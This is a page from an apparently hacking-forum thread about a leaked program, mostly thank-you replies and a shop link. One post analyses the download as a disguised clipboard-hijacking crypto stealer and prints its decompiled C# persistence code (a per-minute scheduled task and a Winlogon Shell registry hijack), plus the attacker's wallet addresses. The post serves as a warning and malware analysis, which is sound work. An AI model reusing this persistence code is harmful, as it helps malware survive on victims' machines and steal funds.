ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content



Photo

Closed


  • Please log in to reply
Closed

#21

Anujamun01
Anujamun01
    Offline
    0
    Rep
    132
    Likes

    DEVIL SENIOR

Posts: 869
Threads: 34
Joined: Nov 03, 2019
Credits: 0

Four years registered
#21

Thank you so much bre


  • 0

?url=https%3A%2F%2Fi.imgur.com%2F3h18bNs

MY SHOP WTF VERY CHEAP : https://shoppy.gg/@Moris


#22

maledettifaggia
maledettifaggia
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 11
Threads: 0
Joined: Feb 08, 2018
Credits: 0
Six years registered
#22

i hope its working


  • 0

#23

PlayBoiProxie
PlayBoiProxie
    Offline
    0
    Rep
    6
    Likes

    New Member

Posts: 17
Threads: 4
Joined: Mar 14, 2020
Credits: 0

Four years registered
#23

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

 

 

~ The file is not a .NET ASM yet the DLLS are 

~ Its a Windows Installer file

~ Requires Admin Privs

~ When extracted two files are presented to us

~ Build.sfx.exe is an Archive

~ Once extracted another file lays within it under the name of "Build.exe"

~ Build.exe is a Banker / Stealer

~ Retrieves Clipbord data and then logs it 

~ Renames it self to "WinService.exe" drops in the Userprofile folder

 

Clipbord WINAPI Imports

	                        [DllImport("User32.dll", CharSet = CharSet.Auto)]
				private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer);

				// Token: 0x06000018 RID: 24
				[DllImport("User32.dll", CharSet = CharSet.Auto)]
				private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);

~Has Regular Shell Startup and Task Startup so every minute the file will be executed. dubbed as "antikill" very poor malware

 

Task Startup:

                public static void AntiKill()
		{
			Process.Start(new ProcessStartInfo
			{
				FileName = "schtasks.exe",
				UseShellExecute = true,
				CreateNoWindow = false,
				WindowStyle = ProcessWindowStyle.Hidden,
				Arguments = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" + Program.Full2 + "\" /f"
			});
			Process.Start(Program.Full2);
			Process.GetCurrentProcess().Kill();
		}

Regular Shell Startup:

		public static void StartUp()
		{
			RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
			registryKey.SetValue("Shell", "explorer.exe, " + Program.Full2);
			try
			{
				RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true);
				registryKey2.SetValue("Shell", "explorer.exe, " + Program.Full2);
			}
			catch
			{
			}
		}

~ Has two Crypto Addresses Linked to it 

 

ETHEREUM: 0xD42A2Ab36f2fa44d5994BFC952978A254b18c8a0

BITCOIN:  3KjaxyBz6vW1m7QWYyyDKd1CwVzqtM6nFD

 

~Looks like only the BTC Stealer action is in play , there is no linking IP Address to send rest of the data to

~ BUILD.exe Scan: https://www.virustot...cf8b3/detection

 

https://imgur.com/a/2zTDWRO

 

 

Dmqj6z5.jpg


  • 0

Send Samples to be looked at

I think you know whats going on ;)

Have a good day <3

Also bring back the Malicious section ....


#24

coronavirusviru
coronavirusviru
    Offline
    -1
    Rep
    3
    Likes

    Member

  • PipPipPip
Posts: 69
Threads: 0
Joined: Mar 20, 2020
Credits: 0

Four years registered
#24

Thanks bro for this leak


  • 0

#25

killer2222
killer2222
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 20
Threads: 0
Joined: Mar 20, 2020
Credits: 0
Four years registered
#25

Leave a like because otherwise i will block the program.

dont block thanks


  • 0

#26

64aeze6a5z6
64aeze6a5z6
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 9
Threads: 0
Joined: Mar 21, 2020
Credits: 0
Four years registered
#26

eazezaezajeazmljkeamzje azeaze aze a


  • 0

#27

ihebweld3ly
ihebweld3ly
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 4
Threads: 0
Joined: Mar 22, 2020
Credits: 0
Four years registered
#27

If this is true omg you deserve the like bro


  • 0

#28

duvanmatos97
duvanmatos97
    Offline
    0
    Rep
    0
    Likes

    Member

Posts: 46
Threads: 0
Joined: Mar 20, 2020
Credits: 0

Four years registered
#28
Thanks

  • 0

#29

Amanda16
Amanda16
    Offline
    0
    Rep
    1
    Likes

    Member

Posts: 41
Threads: 0
Joined: Sep 25, 2019
Credits: 0
Four years registered
#29

ty


  • 0

#30

bader6100
bader6100
    Offline
    0
    Rep
    1
    Likes

    New Member

Posts: 16
Threads: 1
Joined: Oct 02, 2015
Credits: 0

Eight years registered
#30

Leave a like because otherwise i will block the program.


  • 1


 Users browsing this thread: